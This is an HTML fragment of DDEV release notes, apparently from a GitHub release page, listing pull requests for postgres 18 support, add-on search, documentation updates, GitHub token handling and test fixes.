<li>test(buildkite): group log output by <code>--- RUN</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3437161238" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7645" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7645/hovercard" href="https://github.com/ddev/ddev/pull/7645">#7645</a></li>
<li>feat: Update AGENTS.md to reference organization-wide patterns by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3454384738" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7659" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7659/hovercard" href="https://github.com/ddev/ddev/pull/7659">#7659</a></li>
<li>fix(cakephp): do not override APP_DEFAULT_LOCALE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3448243418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7653" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7653/hovercard" href="https://github.com/ddev/ddev/pull/7653">#7653</a></li>
<li>fix(hack-postgres): hack postgres client since postgresql-client:18 is misbehaving, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455295219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7661" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7661/hovercard" href="https://github.com/ddev/ddev/issues/7661">#7661</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455344956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7663" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7663/hovercard" href="https://github.com/ddev/ddev/pull/7663">#7663</a></li>
<li>fix(postgres): uninstall postgresql-client with its dependencies, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455344956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7663" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7663/hovercard" href="https://github.com/ddev/ddev/pull/7663">#7663</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3456310420" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7665" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7665/hovercard" href="https://github.com/ddev/ddev/pull/7665">#7665</a></li>
<li>docs: platform.sh-&gt;upsun name changes, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3449367609" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7654" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7654/hovercard" href="https://github.com/ddev/ddev/issues/7654">#7654</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3465699063" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7673" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7673/hovercard" href="https://github.com/ddev/ddev/pull/7673">#7673</a></li>
<li>feat(warnings): Allow silencing warnings about custom config files, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432283969" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7638" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7638/hovercard" href="https://github.com/ddev/ddev/issues/7638">#7638</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455251590" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7660" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7660/hovercard" href="https://github.com/ddev/ddev/pull/7660">#7660</a></li>
<li>feat(test-ddev): add more distro info and default shell to ddev debug test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3457881955" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7666" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7666/hovercard" href="https://github.com/ddev/ddev/pull/7666">#7666</a></li>
<li>feat(postgres): Support postgres:18, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455295219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7661" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7661/hovercard" href="https://github.com/ddev/ddev/issues/7661">#7661</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455304373" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7662" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7662/hovercard" href="https://github.com/ddev/ddev/pull/7662">#7662</a></li>
<li>feat: add <code>ddev add-on search</code> subcommand, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3271485002" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7491" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7491/hovercard" href="https://github.com/ddev/ddev/issues/7491">#7491</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3349955579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7554" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7554/hovercard" href="https://github.com/ddev/ddev/pull/7554">#7554</a></li>
<li>feat(db): remove the hardcoded --server-id=0 parameter from MySQL startup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2685087951" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6768" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6768/hovercard" href="https://github.com/ddev/ddev/issues/6768">#6768</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3398642974" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7608" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7608/hovercard" href="https://github.com/ddev/ddev/pull/7608">#7608</a></li>
<li>chore(buildkite): add DDEV_GITHUB_TOKEN for DDEV_RUN_GET_TESTS and don't run tests on skip by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3473506770" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7680" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7680/hovercard" href="https://github.com/ddev/ddev/pull/7680">#7680</a></li>
<li>build(image): use native arm builder for building docker images, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3338014772" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7539" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7539/hovercard" href="https://github.com/ddev/ddev/issues/7539">#7539</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3349925299" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7553" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7553/hovercard" href="https://github.com/ddev/ddev/pull/7553">#7553</a></li>
<li>fix(postgres): normalize path on Windows, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470721135" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7679" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7679/hovercard" href="https://github.com/ddev/ddev/issues/7679">#7679</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474063665" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7682" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7682/hovercard" href="https://github.com/ddev/ddev/pull/7682">#7682</a></li>
<li>feat: update ddev debug test to emphasize global ddev dir [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477745569" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7684" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7684/hovercard" href="https://github.com/ddev/ddev/pull/7684">#7684</a></li>
<li>feat: use 'ddev utility' instead of 'ddev debug', fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477427379" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7683" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7683/hovercard" href="https://github.com/ddev/ddev/issues/7683">#7683</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477852641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7685" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7685/hovercard" href="https://github.com/ddev/ddev/pull/7685">#7685</a></li>
<li>docs(moodle): update moodle quickstart to have composer_root in root, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484138162" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7692" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7692/hovercard" href="https://github.com/ddev/ddev/issues/7692">#7692</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484153441" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7693" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7693/hovercard" href="https://github.com/ddev/ddev/pull/7693">#7693</a></li>
<li>fix: disable <code>.env</code> parsing for <code>docker-compose pull</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3464922448" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7671" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7671/hovercard" href="https://github.com/ddev/ddev/issues/7671">#7671</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3480926589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7687" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7687/hovercard" href="https://github.com/ddev/ddev/pull/7687">#7687</a></li>
<li>chore: remove contributors.yml and use latest golangci-lint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3489020702" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7699" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7699/hovercard" href="https://github.com/ddev/ddev/pull/7699">#7699</a></li>
<li>fix: don't use GITHUB_OWNER variable for install_ddev.sh, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3482540529" data-permission-text="Title is private" data-url="https://github.com/ddev/github-action-setup-ddev/issues/54" data-hovercard-type="issue" data-hovercard-url="/ddev/github-action-setup-ddev/issues/54/hovercard" href="https://github.com/ddev/github-action-setup-ddev/issues/54">ddev/github-action-setup-ddev#54</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3486745234" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7695" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7695/hovercard" href="https://github.com/ddev/ddev/pull/7695">#7695</a></li>
<li>fix: show if DDEV_GITHUB_TOKEN was used in download requests, add DDEV_GLOBAL_DIR env, skip add-on tests without token, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434583644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7641" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7641/hovercard" href="https://github.com/ddev/ddev/issues/7641">#7641</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3479281007" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7686" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7686/hovercard" href="https://github.com/ddev/ddev/pull/7686">#7686</a></li>
<li>fix: start container only after attach in <code>ddev auth ssh</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3455928717" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7664" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7664/hovercard" href="https://github.com/ddev/ddev/issues/7664">#7664</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3473843705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7681" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7681/hovercard" href="https://github.com/ddev/ddev/pull/7681">#7681</a></li>
<li>feat(dockercheck): improve ddev ut dockercheck, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3465496916" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7672" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7672/hovercard" href="https://github.com/ddev/ddev/issues/7672">#7672</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484025675" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7690" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7690/hovercard" href="https://github.com/ddev/ddev/pull/7690">#7690</a></li>
<li>fix: improve MOTD and sponsorship message controls, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3247470227" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7468" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7468/hovercard" href="https://github.com/ddev/ddev/issues/7468">#7468</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469571696" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7676" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7676/hovercard" href="https://github.com/ddev/ddev/issues/7676">#7676</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2799882615" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6918" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6918/hovercard" href="https://github.com/ddev/ddev/issues/6918">#6918</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3484043051" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7691" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7691/hovercard" href="https://github.com/ddev/ddev/pull/7691">#7691</a></li>
<li>fix: ddev debug test shouldn't leave dead ddev-utilities containers [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3491911964" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7701" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7701/hovercard" href="https://github.com/ddev/ddev/pull/7701">#7701</a></li>
<li>refactor(add-ons): exclude archived repositories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3496640437" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7705" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7705/hovercard" href="https://github.com/ddev/ddev/pull/7705">#7705</a></li>
<li>test: npmjs.com no longer allows unchallenged curl [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3506722224" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7706" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7706/hovercard" href="https://github.com/ddev/ddev/pull/7706">#7706</a></li>
<li>docs(macos): bump system requirements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3533333391" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7729" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7729/hovercard" href="https://github.com/ddev/ddev/pull/7729">#7729</a></li>
<li>fix(codespaces): use lightweight debian-12 image, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3063729923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7294" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7294/hovercard" href="https://github.com/ddev/ddev/issues/7294">#7294</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517469856" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7713" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7713/hovercard" href="https://github.com/ddev/ddev/pull/7713">#7713</a></li>
<li>fix(github): retry without auth on invalid GitHub token, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3434583644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7641" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7641/hovercard" href="https://github.com/ddev/ddev/issues/7641">#7641</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3525967876" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7717" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7717/hovercard" href="https://github.com/ddev/ddev/pull/7717">#7717</a></li>
<li>fix(mutagen): use fixed length for <code>com.ddev.volume-signature</code> label, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3514570713" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7710" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7710/hovercard" href="https://github.com/ddev/ddev/issues/7710">#7710</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517349613" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7712" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7712/hovercard" href="https://github.com/ddev/ddev/pull/7712">#7712</a></li>
<li>docs: add commands for preparing DDEV to work offline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3532568292" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7726" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7726/hovercard" href="https://github.com/ddev/ddev/pull/7726">#7726</a></li>
<li>docs: fix a little custom command annotations code example by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TravisCarden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TravisCarden">@TravisCarden</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3515388161" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7711" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7711/hovercard" href="https://github.com/ddev/ddev/pull/7711">#7711</a></li>
<li>feat(heidisql): allow postgres connections, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469508925" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7675" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7675/hovercard" href="https://github.com/ddev/ddev/issues/7675">#7675</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469596003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7677" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7677/hovercard" href="https://github.com/ddev/ddev/pull/7677">#7677</a></li>
<li>docs: explicitly mention setting system managed nvm version, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2204536474" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6013" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6013/hovercard" href="https://github.com/ddev/ddev/issues/6013">#6013</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JshGrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JshGrn">@JshGrn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536973192" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7733" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7733/hovercard" href="https://github.com/ddev/ddev/pull/7733">#7733</a></li>
<li>refactor: remove Gitpod configuration and build infrastructure by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3524650181" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7716" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7716/hovercard" href="https://github.com/ddev/ddev/pull/7716">#7716</a></li>
<li>test: try to make TestMutagenSimple slightly more reliable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536879176" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7732" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7732/hovercard" href="https://github.com/ddev/ddev/pull/7732">#7732</a></li>
<li>feat(debug): show web/db container logs on error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537552248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7736" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7736/hovercard" href="https://github.com/ddev/ddev/pull/7736">#7736</a></li>
<li>feat(xdebug): add xdebug_info() to <code>ddev xdebug info</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3521122107" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7715" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7715/hovercard" href="https://github.com/ddev/ddev/issues/7715">#7715</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3530382931" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7721" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7721/hovercard" href="https://github.com/ddev/ddev/pull/7721">#7721</a></li>
<li>refactor: move <code>util.GetContainerUIDGid</code> to <code>dockerutil.GetContainerUser</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537335599" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7734" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7734/hovercard" href="https://github.com/ddev/ddev/pull/7734">#7734</a></li>
<li>refactor: simplify db volume chown, use WarningOnce by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3537527103" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7735" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7735/hovercard" href="https://github.com/ddev/ddev/pull/7735">#7735</a></li>
